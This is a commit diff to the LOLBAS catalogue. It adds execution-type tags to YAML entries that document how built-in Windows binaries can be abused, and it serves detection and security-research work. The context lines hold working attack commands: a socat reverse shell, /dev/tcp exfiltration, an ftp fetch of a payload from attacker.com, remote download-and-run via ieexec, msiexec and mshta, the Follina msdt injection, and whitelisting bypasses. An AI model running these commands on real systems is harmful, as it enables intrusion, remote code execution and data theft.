Adding Execute tags to most LOLBas (#405)

2025-01-30 15:23:07 +01:00 · 2024-12-29 18:31:01 +01:00 · 2024-12-29 18:31:01 +01:00 · b9a6cd6a87
commit b9a6cd6a87
parent baaa5bbc73
129 changed files with 520 additions and 59 deletions
--- a/yml/OSBinaries/Addinutil.yml
+++ b/yml/OSBinaries/Addinutil.yml
@ -11,6 +11,8 @@ Commands:
    Privileges: User
    MitreID: T1218
    OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: .NetObjects
 Full_Path:
  - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddinUtil.exe
  - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddinUtil.exe
--- a/yml/OSBinaries/At.yml
+++ b/yml/OSBinaries/At.yml
@ -11,6 +11,8 @@ Commands:
    Privileges: Local Admin
    MitreID: T1053.002
    OperatingSystem: Windows 7 or older
    Tags:
      - Execute: CMD
 Full_Path:
  - Path: C:\WINDOWS\System32\At.exe
  - Path: C:\WINDOWS\SysWOW64\At.exe
--- a/yml/OSBinaries/Atbroker.yml
+++ b/yml/OSBinaries/Atbroker.yml
@ -11,6 +11,8 @@ Commands:
    Privileges: User
    MitreID: T1218
    OperatingSystem: Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: EXE
 Full_Path:
  - Path: C:\Windows\System32\Atbroker.exe
  - Path: C:\Windows\SysWOW64\Atbroker.exe
--- a/yml/OSBinaries/Bash.yml
+++ b/yml/OSBinaries/Bash.yml
@ -11,6 +11,8 @@ Commands:
    Privileges: User
    MitreID: T1202
    OperatingSystem: Windows 10
    Tags:
      - Execute: CMD
  - Command: bash.exe -c "socat tcp-connect:192.168.1.9:66 exec:sh,pty,stderr,setsid,sigint,sane"
    Description: Executes a reverseshell
    Usecase: Performs execution of specified file, can be used as a defensive evasion.
@ -18,6 +20,8 @@ Commands:
    Privileges: User
    MitreID: T1202
    OperatingSystem: Windows 10
    Tags:
      - Execute: CMD
  - Command: bash.exe -c 'cat file_to_exfil.zip > /dev/tcp/192.168.1.10/24'
    Description: Exfiltrate data
    Usecase: Performs execution of specified file, can be used as a defensive evasion.
@ -25,6 +29,8 @@ Commands:
    Privileges: User
    MitreID: T1202
    OperatingSystem: Windows 10
    Tags:
      - Execute: CMD
  - Command: bash.exe -c calc.exe
    Description: Executes calc.exe from bash.exe
    Usecase: Performs execution of specified file, can be used to bypass Application Whitelisting.
@ -32,6 +38,8 @@ Commands:
    Privileges: User
    MitreID: T1202
    OperatingSystem: Windows 10
    Tags:
      - Execute: CMD
 Full_Path:
  - Path: C:\Windows\System32\bash.exe
  - Path: C:\Windows\SysWOW64\bash.exe
--- a/yml/OSBinaries/Cmstp.yml
+++ b/yml/OSBinaries/Cmstp.yml
@ -12,7 +12,7 @@ Commands:
    MitreID: T1218.003
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
-      - Input: INF
+      - Execute: INF
  - Command: cmstp.exe /ni /s https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Cmstp.inf
    Description: Silently installs a specially formatted remote .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll.
    Usecase: Execute code hidden within an inf file. Execute code directly from Internet.
@ -21,7 +21,8 @@ Commands:
    MitreID: T1218.003
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
    Tags:
-      - Input: INF
+      - Execute: INF
      - Execute: Remote
 Full_Path:
  - Path: C:\Windows\System32\cmstp.exe
  - Path: C:\Windows\SysWOW64\cmstp.exe
--- a/yml/OSBinaries/Conhost.yml
+++ b/yml/OSBinaries/Conhost.yml
@ -11,6 +11,8 @@ Commands:
    Privileges: User
    MitreID: T1202
    OperatingSystem: Windows 10, Windows 11
    Tags:
      - Execute: CMD
  - Command: "conhost.exe --headless calc.exe"
    Description: Execute calc.exe with conhost.exe as parent process
    Usecase: Specify --headless parameter to hide child process window (if applicable)
@ -18,6 +20,8 @@ Commands:
    Privileges: User
    MitreID: T1202
    OperatingSystem: Windows 10, Windows 11
    Tags:
      - Execute: CMD
 Full_Path:
  - Path: c:\windows\system32\conhost.exe
 Detection:
--- a/yml/OSBinaries/Control.yml
+++ b/yml/OSBinaries/Control.yml
@ -13,6 +13,15 @@ Commands:
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: DLL
  - Command: control.exe c:\windows\tasks\evil.cpl
    Description: Execute evil.cpl payload. A CPL is a DLL file with CPlApplet export function)
    Usecase: Use to execute code and bypass application whitelisting
    Category: Execute
    Privileges: User
    MitreID: T1218.002
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: DLL
 Full_Path:
  - Path: C:\Windows\System32\control.exe
  - Path: C:\Windows\SysWOW64\control.exe
--- a/yml/OSBinaries/CustomShellHost.yml
+++ b/yml/OSBinaries/CustomShellHost.yml
@ -11,6 +11,8 @@ Commands:
    Privileges: User
    MitreID: T1218
    OperatingSystem: Windows 10, Windows 11
    Tags:
      - Execute: EXE
 Full_Path:
  - Path: C:\Windows\System32\CustomShellHost.exe
 Detection:
--- a/yml/OSBinaries/Dfsvc.yml
+++ b/yml/OSBinaries/Dfsvc.yml
@ -11,6 +11,9 @@ Commands:
    Privileges: User
    MitreID: T1127
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: ClickOnce
      - Execute: Remote
 Full_Path:
  - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Dfsvc.exe
  - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Dfsvc.exe
--- a/yml/OSBinaries/Diskshadow.yml
+++ b/yml/OSBinaries/Diskshadow.yml
@ -11,6 +11,8 @@ Commands:
    Privileges: User
    MitreID: T1003.003
    OperatingSystem: Windows server
    Tags:
      - Execute: CMD
  - Command: diskshadow> exec calc.exe
    Description: Execute commands using diskshadow.exe to spawn child process
    Usecase: Use diskshadow to bypass defensive counter measures
@ -18,6 +20,8 @@ Commands:
    Privileges: User
    MitreID: T1202
    OperatingSystem: Windows server
    Tags:
      - Execute: CMD
 Full_Path:
  - Path: C:\Windows\System32\diskshadow.exe
  - Path: C:\Windows\SysWOW64\diskshadow.exe
--- a/yml/OSBinaries/Dnscmd.yml
+++ b/yml/OSBinaries/Dnscmd.yml
@ -13,6 +13,7 @@ Commands:
    OperatingSystem: Windows server
    Tags:
      - Execute: DLL
      - Execute: Remote
 Full_Path:
  - Path: C:\Windows\System32\Dnscmd.exe
  - Path: C:\Windows\SysWOW64\Dnscmd.exe
--- a/yml/OSBinaries/Esentutl.yml
+++ b/yml/OSBinaries/Esentutl.yml
@ -46,7 +46,6 @@ Commands:
    Privileges: Admin
    MitreID: T1003.003
    OperatingSystem: Windows 10, Windows 11, Windows 2016 Server, Windows 2019 Server
 Full_Path:
  - Path: C:\Windows\System32\esentutl.exe
  - Path: C:\Windows\SysWOW64\esentutl.exe
--- a/yml/OSBinaries/Eventvwr.yml
+++ b/yml/OSBinaries/Eventvwr.yml
@ -13,6 +13,7 @@ Commands:
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
    Tags:
      - Application: GUI
      - Execute: EXE
  - Command: ysoserial.exe -o raw -f BinaryFormatter - g DataSet -c calc > RecentViews & copy RecentViews %LOCALAPPDATA%\Microsoft\EventV~1\RecentViews & eventvwr.exe
    Description: During startup, eventvwr.exe uses .NET deserialization with %LOCALAPPDATA%\Microsoft\EventV~1\RecentViews file. This file can be created using https://github.com/pwntester/ysoserial.net
    Usecase: Execute a command to bypass security restrictions that limit the use of command-line interpreters.
@ -22,6 +23,7 @@ Commands:
    OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10
    Tags:
      - Application: GUI
      - Execute: .NetObjects
 Full_Path:
  - Path: C:\Windows\System32\eventvwr.exe
  - Path: C:\Windows\SysWOW64\eventvwr.exe
--- a/yml/OSBinaries/Explorer.yml
+++ b/yml/OSBinaries/Explorer.yml
@ -11,6 +11,8 @@ Commands:
    Privileges: User
    MitreID: T1202
    OperatingSystem: Windows XP, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: EXE
  - Command: explorer.exe C:\Windows\System32\notepad.exe
    Description: Execute notepad.exe with the parent process spawning from a new instance of explorer.exe
    Usecase: Performs execution of specified file with explorer parent process breaking the process tree, can be used for defense evasion.
@ -18,6 +20,8 @@ Commands:
    Privileges: User
    MitreID: T1202
    OperatingSystem: Windows 10, Windows 11
    Tags:
      - Execute: EXE
 Full_Path:
  - Path: C:\Windows\explorer.exe
  - Path: C:\Windows\SysWOW64\explorer.exe
--- a/yml/OSBinaries/Forfiles.yml
+++ b/yml/OSBinaries/Forfiles.yml
@ -11,6 +11,8 @@ Commands:
    Privileges: User
    MitreID: T1202
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: EXE
  - Command: forfiles /p c:\windows\system32 /m notepad.exe /c "c:\folder\normal.dll:evil.exe"
    Description: Executes the evil.exe Alternate Data Stream (AD) since there is a match for notepad.exe in the c:\windows\system32 folder.
    Usecase: Use forfiles to start a new process from a binary hidden in an alternate data stream
@ -18,6 +20,8 @@ Commands:
    Privileges: User
    MitreID: T1564.004
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: EXE
 Full_Path:
  - Path: C:\Windows\System32\forfiles.exe
  - Path: C:\Windows\SysWOW64\forfiles.exe
--- a/yml/OSBinaries/Fsutil.yml
+++ b/yml/OSBinaries/Fsutil.yml
@ -25,6 +25,8 @@ Commands:
    Privileges: User
    MitreID: T1218
    OperatingSystem: Windows 11
    Tags:
      - Execute: EXE
 Full_Path:
  - Path: C:\Windows\System32\fsutil.exe
  - Path: C:\Windows\SysWOW64\fsutil.exe
--- a/yml/OSBinaries/Ftp.yml
+++ b/yml/OSBinaries/Ftp.yml
@ -11,6 +11,8 @@ Commands:
    Privileges: User
    MitreID: T1202
    OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: CMD
  - Command: cmd.exe /c "@echo open attacker.com 21>ftp.txt&@echo USER attacker>>ftp.txt&@echo PASS PaSsWoRd>>ftp.txt&@echo binary>>ftp.txt&@echo GET /payload.exe>>ftp.txt&@echo quit>>ftp.txt&@ftp -s:ftp.txt -v"
    Description: Download
    Usecase: Spawn new process using ftp.exe. Ftp.exe downloads the binary.
--- a/yml/OSBinaries/Gpscript.yml
+++ b/yml/OSBinaries/Gpscript.yml
@ -11,6 +11,8 @@ Commands:
    Privileges: Administrator
    MitreID: T1218
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: CMD
  - Command: Gpscript /startup
    Description: Executes startup scripts configured in Group Policy
    Usecase: Add local group policy logon script to execute file and hide from defensive counter measures
@ -18,6 +20,8 @@ Commands:
    Privileges: Administrator
    MitreID: T1218
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: CMD
 Full_Path:
  - Path: C:\Windows\System32\gpscript.exe
  - Path: C:\Windows\SysWOW64\gpscript.exe
--- a/yml/OSBinaries/Hh.yml
+++ b/yml/OSBinaries/Hh.yml
@ -11,6 +11,9 @@ Commands:
    Privileges: User
    MitreID: T1105
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: EXE
      - Application: GUI
  - Command: HH.exe c:\windows\system32\calc.exe
    Description: Executes calc.exe with HTML Help.
    Usecase: Execute process with HH.exe
@ -18,6 +21,20 @@ Commands:
    Privileges: User
    MitreID: T1218.001
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: EXE
      - Application: GUI
  - Command: HH.exe http://some.url/payload.chm
    Description: Executes a remote payload.chm file which can contain commands.
    Usecase: Execute commands with HH.exe
    Category: Execute
    Privileges: User
    MitreID: T1218.001
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: CMD
      - Execute: CHM
      - Execute: Remote
 Full_Path:
  - Path: C:\Windows\hh.exe
  - Path: C:\Windows\SysWOW64\hh.exe
--- a/yml/OSBinaries/Ie4uinit.yml
+++ b/yml/OSBinaries/Ie4uinit.yml
@ -11,6 +11,8 @@ Commands:
    Privileges: User
    MitreID: T1218
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: INF
 Full_Path:
  - Path: c:\windows\system32\ie4uinit.exe
  - Path: c:\windows\sysWOW64\ie4uinit.exe
--- a/yml/OSBinaries/Iediagcmd.yml
+++ b/yml/OSBinaries/Iediagcmd.yml
@ -11,6 +11,8 @@ Commands:
    Privileges: User
    MitreID: T1218
    OperatingSystem: Windows 10 1803, Windows 10 1703, Windows 10 22H1, Windows 10 22H2, Windows 11
    Tags:
      - Execute: EXE
 Full_Path:
  - Path: C:\Program Files\Internet Explorer\iediagcmd.exe
 Detection:
--- a/yml/OSBinaries/Ieexec.yml
+++ b/yml/OSBinaries/Ieexec.yml
@ -11,6 +11,9 @@ Commands:
    Privileges: User
    MitreID: T1105
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
    Tags:
      - Execute: Remote
      - Execute: EXE (.NET)
  - Command: ieexec.exe http://x.x.x.x:8080/bypass.exe
    Description: Downloads and executes bypass.exe from the remote server.
    Usecase: Download and run attacker code from remote location
@ -18,6 +21,9 @@ Commands:
    Privileges: User
    MitreID: T1218
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
    Tags:
      - Execute: Remote
      - Execute: EXE (.NET)
 Full_Path:
  - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\ieexec.exe
  - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\ieexec.exe
--- a/yml/OSBinaries/Infdefaultinstall.yml
+++ b/yml/OSBinaries/Infdefaultinstall.yml
@ -11,6 +11,8 @@ Commands:
    Privileges: Admin
    MitreID: T1218
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: INF
 Full_Path:
  - Path: C:\Windows\System32\Infdefaultinstall.exe
  - Path: C:\Windows\SysWOW64\Infdefaultinstall.exe
--- a/yml/OSBinaries/Installutil.yml
+++ b/yml/OSBinaries/Installutil.yml
@ -12,8 +12,8 @@ Commands:
    MitreID: T1218.004
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
-      - Execute: DLL
+      - Execute: DLL (.NET)
-      - Input: Custom Format
+      - Execute: EXE (.NET)
  - Command: InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll
    Description: Execute the target .NET DLL or EXE.
    Usecase: Use to execute code and bypass application whitelisting
@ -22,8 +22,8 @@ Commands:
    MitreID: T1218.004
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
-      - Execute: DLL
+      - Execute: DLL (.NET)
-      - Input: Custom Format
+      - Execute: EXE (.NET)
  - Command: InstallUtil.exe https://example.com/payload
    Description: It will download a remote payload and place it in INetCache.
    Usecase: Downloads payload from remote server
--- a/yml/OSBinaries/Jsc.yml
+++ b/yml/OSBinaries/Jsc.yml
@ -12,7 +12,7 @@ Commands:
    MitreID: T1127
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
-      - Execute: WSH
+      - Execute: JScript
  - Command: jsc.exe /t:library Library.js
    Description: Use jsc.exe to compile JavaScript code stored in Library.js and output Library.dll.
    Usecase: Compile attacker code on system. Bypass defensive counter measures.
@ -21,7 +21,7 @@ Commands:
    MitreID: T1127
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
-      - Execute: WSH
+      - Execute: JScript
 Full_Path:
  - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Jsc.exe
  - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Jsc.exe
--- a/yml/OSBinaries/Microsoft.Workflow.Compiler.yml
+++ b/yml/OSBinaries/Microsoft.Workflow.Compiler.yml
@ -11,6 +11,9 @@ Commands:
    Privileges: User
    MitreID: T1127
    OperatingSystem: Windows 10S, Windows 11
    Tags:
      - Execute: VB.Net
      - Execute: Csharp
  - Command: Microsoft.Workflow.Compiler.exe tests.txt results.txt
    Description: Compile and execute C# or VB.net code in a XOML file referenced in the test.txt file.
    Usecase: Compile and run code
@ -18,6 +21,8 @@ Commands:
    Privileges: User
    MitreID: T1127
    OperatingSystem: Windows 10S, Windows 11
    Tags:
      - Execute: XOML
  - Command: Microsoft.Workflow.Compiler.exe tests.txt results.txt
    Description: Compile and execute C# or VB.net code in a XOML file referenced in the test.txt file.
    Usecase: Compile and run code
@ -25,6 +30,8 @@ Commands:
    Privileges: User
    MitreID: T1127
    OperatingSystem: Windows 10S, Windows 11
    Tags:
      - Execute: XOML
 Full_Path:
  - Path: C:\Windows\Microsoft.Net\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe
 Code_Sample:
--- a/yml/OSBinaries/Mmc.yml
+++ b/yml/OSBinaries/Mmc.yml
@ -11,6 +11,8 @@ Commands:
    Privileges: User
    MitreID: T1218.014
    OperatingSystem: Windows 10 (and possibly earlier versions), Windows 11
    Tags:
      - Execute: COM
  - Command: mmc.exe gpedit.msc
    Description: Load an arbitrary payload DLL by configuring COR Profiler registry settings and launching MMC to bypass UAC.
    Usecase: Modify HKCU\Environment key in Registry with COR profiler values then launch MMC to load the payload DLL.
@ -18,6 +20,8 @@ Commands:
    Privileges: Administrator
    MitreID: T1218.014
    OperatingSystem: Windows 10 (and possibly earlier versions), Windows 11
    Tags:
      - Execute: DLL
 Full_Path:
  - Path: C:\Windows\System32\mmc.exe
  - Path: C:\Windows\SysWOW64\mmc.exe
--- a/yml/OSBinaries/Msbuild.yml
+++ b/yml/OSBinaries/Msbuild.yml
@ -11,6 +11,8 @@ Commands:
    Privileges: User
    MitreID: T1127.001
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: CSharp
  - Command: msbuild.exe project.csproj
    Description: Build and execute a C# project stored in the target csproj file.
    Usecase: Compile and run code
@ -18,6 +20,8 @@ Commands:
    Privileges: User
    MitreID: T1127.001
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: CSharp
  - Command: msbuild.exe /logger:TargetLogger,C:\Loggers\TargetLogger.dll;MyParameters,Foo
    Description: Executes generated Logger DLL file with TargetLogger export
    Usecase: Execute DLL
@ -35,7 +39,7 @@ Commands:
    MitreID: T1127.001
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
-      - Execute: WSH
+      - Execute: XSL
  - Command: msbuild.exe @sample.rsp
    Description: By putting any valid msbuild.exe command-line options in an RSP file and calling it as above will interpret the options as if they were passed on the command line.
    Usecase: Bypass command-line based detections
@ -43,6 +47,8 @@ Commands:
    Privileges: User
    MitreID: T1036
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: CMD
 Full_Path:
  - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Msbuild.exe
  - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Msbuild.exe
--- a/yml/OSBinaries/Msconfig.yml
+++ b/yml/OSBinaries/Msconfig.yml
@ -11,6 +11,8 @@ Commands:
    Privileges: Administrator
    MitreID: T1218
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
    Tags:
      - Execute: CMD
 Full_Path:
  - Path: C:\Windows\System32\msconfig.exe
 Code_Sample:
--- a/yml/OSBinaries/Msdt.yml
+++ b/yml/OSBinaries/Msdt.yml
@ -13,6 +13,7 @@ Commands:
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Application: GUI
      - Execute: MSI
  - Command: msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml /skip TRUE
    Description: Executes the Microsoft Diagnostics Tool and executes the malicious .MSI referenced in the PCW8E57.xml file.
    Usecase: Execute code bypass Application whitelisting
@ -22,6 +23,7 @@ Commands:
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Application: GUI
      - Execute: MSI
  - Command: msdt.exe /id PCWDiagnostic /skip force /param "IT_LaunchMethod=ContextMenu IT_BrowseForFile=/../../$(calc).exe"
    Description: Executes arbitrary commands using the Microsoft Diagnostics Tool and leveraging the "PCWDiagnostic" module (CVE-2022-30190). Note that this specific technique will not work on a patched system with the June 2022 Windows Security update.
    Usecase: Execute code bypass Application allowlisting
@ -31,6 +33,7 @@ Commands:
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Application: GUI
      - Execute: CMD
 Full_Path:
  - Path: C:\Windows\System32\Msdt.exe
  - Path: C:\Windows\SysWOW64\Msdt.exe
--- a/yml/OSBinaries/Msedge.yml
+++ b/yml/OSBinaries/Msedge.yml
@ -25,6 +25,8 @@ Commands:
    Privileges: User
    MitreID: T1218.015
    OperatingSystem: Windows 10, Windows 11
    Tags:
      - Execute: CMD
 Full_Path:
  - Path: c:\Program Files\Microsoft\Edge\Application\msedge.exe
  - Path: c:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
--- a/yml/OSBinaries/Mshta.yml
+++ b/yml/OSBinaries/Mshta.yml
@ -12,7 +12,8 @@ Commands:
    MitreID: T1218.005
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
-      - Execute: WSH
+      - Execute: HTA
      - Execute: Remote
  - Command: mshta.exe vbscript:Close(Execute("GetObject(""script:https://webserver/payload.sct"")"))
    Description: Executes VBScript supplied as a command line argument.
    Usecase: Execute code
@ -20,6 +21,8 @@ Commands:
    Privileges: User
    MitreID: T1218.005
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: VBScript
  - Command: mshta.exe javascript:a=GetObject("script:https://webserver/payload.sct").Exec();close();
    Description: Executes JavaScript supplied as a command line argument.
    Usecase: Execute code
@ -27,6 +30,8 @@ Commands:
    Privileges: User
    MitreID: T1218.005
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: JScript
  - Command: mshta.exe "C:\ads\file.txt:file.hta"
    Description: Opens the target .HTA and executes embedded JavaScript, JScript, or VBScript.
    Usecase: Execute code hidden in alternate data stream
@ -35,7 +40,7 @@ Commands:
    MitreID: T1218.005
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 (Does not work on 1903 and newer)
    Tags:
-      - Execute: WSH
+      - Execute: HTA
  - Command: mshta.exe https://example.com/payload
    Description: It will download a remote payload and place it in INetCache.
    Usecase: Downloads payload from remote server
--- a/yml/OSBinaries/Msiexec.yml
+++ b/yml/OSBinaries/Msiexec.yml
@ -11,6 +11,8 @@ Commands:
    Privileges: User
    MitreID: T1218.007
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: MSI
  - Command: msiexec /q /i http://192.168.100.3/tmp/cmd.png
    Description: Installs the target remote & renamed .MSI file silently.
    Usecase: Execute custom made msi file with attack code from remote server
@ -18,6 +20,9 @@ Commands:
    Privileges: User
    MitreID: T1218.007
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: MSI
      - Execute: Remote
  - Command: msiexec /y "C:\folder\evil.dll"
    Description: Calls DllRegisterServer to register the target DLL.
    Usecase: Execute dll files
@ -27,6 +32,7 @@ Commands:
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: DLL
      - Execute: Remote
  - Command: msiexec /z "C:\folder\evil.dll"
    Description: Calls DllUnregisterServer to un-register the target DLL.
    Usecase: Execute dll files
@ -36,6 +42,7 @@ Commands:
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: DLL
      - Execute: Remote
  - Command: msiexec /i "https://trustedURL/signed.msi" TRANSFORMS="https://evilurl/evil.mst" /qb
    Description: Installs the target .MSI file from a remote URL, the file can be signed by vendor. Additional to the file a transformation file will be used, which can contains malicious code or binaries. The /qb will skip user input.
    Usecase: Install trusted and signed msi file, with additional attack code as transformation file, from a remote server
@ -43,6 +50,10 @@ Commands:
    Privileges: User
    MitreID: T1218.007
    OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: MSI
      - Execute: MST
      - Execute: Remote
 Full_Path:
  - Path: C:\Windows\System32\msiexec.exe
  - Path: C:\Windows\SysWOW64\msiexec.exe
--- a/yml/OSBinaries/Pcalua.yml
+++ b/yml/OSBinaries/Pcalua.yml
@ -11,6 +11,8 @@ Commands:
    Privileges: User
    MitreID: T1202
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: EXE
  - Command: pcalua.exe -a \\server\payload.dll
    Description: Open the target .DLL file with the Program Compatibilty Assistant.
    Usecase: Proxy execution of remote dll file
@ -20,6 +22,7 @@ Commands:
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
    Tags:
      - Execute: DLL
      - Execute: Remote
  - Command: pcalua.exe -a C:\Windows\system32\javacpl.cpl -c Java
    Description: Open the target .CPL file with the Program Compatibility Assistant.
    Usecase: Execution of CPL files
@ -27,6 +30,8 @@ Commands:
    Privileges: User
    MitreID: T1202
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: DLL
 Full_Path:
  - Path: C:\Windows\System32\pcalua.exe
 Detection:
--- a/yml/OSBinaries/Pcwrun.yml
+++ b/yml/OSBinaries/Pcwrun.yml
@ -11,6 +11,8 @@ Commands:
    Privileges: User
    MitreID: T1218
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: EXE
  - Command: Pcwrun.exe /../../$(calc).exe
    Description: Leverage the MSDT follina vulnerability through Pcwrun to execute arbitrary commands and binaries. Note that this specific technique will not work on a patched system with the June 2022 Windows Security update.
    Usecase: Proxy execution of binary
@ -18,6 +20,8 @@ Commands:
    Privileges: User
    MitreID: T1202
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: EXE
 Full_Path:
  - Path: C:\Windows\System32\pcwrun.exe
 Detection:
--- a/yml/OSBinaries/Pnputil.yml
+++ b/yml/OSBinaries/Pnputil.yml
@ -11,6 +11,8 @@ Commands:
    Privileges: Administrator
    MitreID: T1547
    OperatingSystem: Windows 7, Windows 10, Windows 11
    Tags:
      - Execute: INF
 Full_Path:
  - Path: C:\Windows\system32\pnputil.exe
 Code_Sample:
--- a/yml/OSBinaries/Presentationhost.yml
+++ b/yml/OSBinaries/Presentationhost.yml
@ -11,6 +11,8 @@ Commands:
    Privileges: User
    MitreID: T1218
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
    Tags:
      - Execute: XBAP
  - Command: Presentationhost.exe https://example.com/payload
    Description: It will download a remote payload and place it in INetCache.
    Usecase: Downloads payload from remote server
--- a/yml/OSBinaries/Provlaunch.yml
+++ b/yml/OSBinaries/Provlaunch.yml
@ -11,6 +11,8 @@ Commands:
    Privileges: Administrator
    MitreID: T1218
    OperatingSystem: Windows 10, Windows 11, Windows Server 2012, Windows Server 2016, Windows Server 2019, Windows Server 2022
    Tags:
      - Execute: CMD
 Full_Path:
  - Path: c:\windows\system32\provlaunch.exe
 Detection:
--- a/yml/OSBinaries/Regasm.yml
+++ b/yml/OSBinaries/Regasm.yml
@ -5,15 +5,14 @@ Author: 'Oddvar Moe'
 Created: 2018-05-25
 Commands:
  - Command: regasm.exe AllTheThingsx64.dll
-    Description: Loads the target .DLL file and executes the RegisterClass function.
+    Description: Loads the target .Net DLL file and executes the RegisterClass function.
    Usecase: Execute code and bypass Application whitelisting
    Category: AWL Bypass
    Privileges: Local Admin
    MitreID: T1218.009
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
-      - Execute: DLL
+      - Execute: DLL (.NET)
      - Input: Custom Format
  - Command: regasm.exe /U AllTheThingsx64.dll
    Description: Loads the target .DLL file and executes the UnRegisterClass function.
    Usecase: Execute code and bypass Application whitelisting
@ -22,8 +21,7 @@ Commands:
    MitreID: T1218.009
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
-      - Execute: DLL
+      - Execute: DLL (.NET)
      - Input: Custom Format
 Full_Path:
  - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\regasm.exe
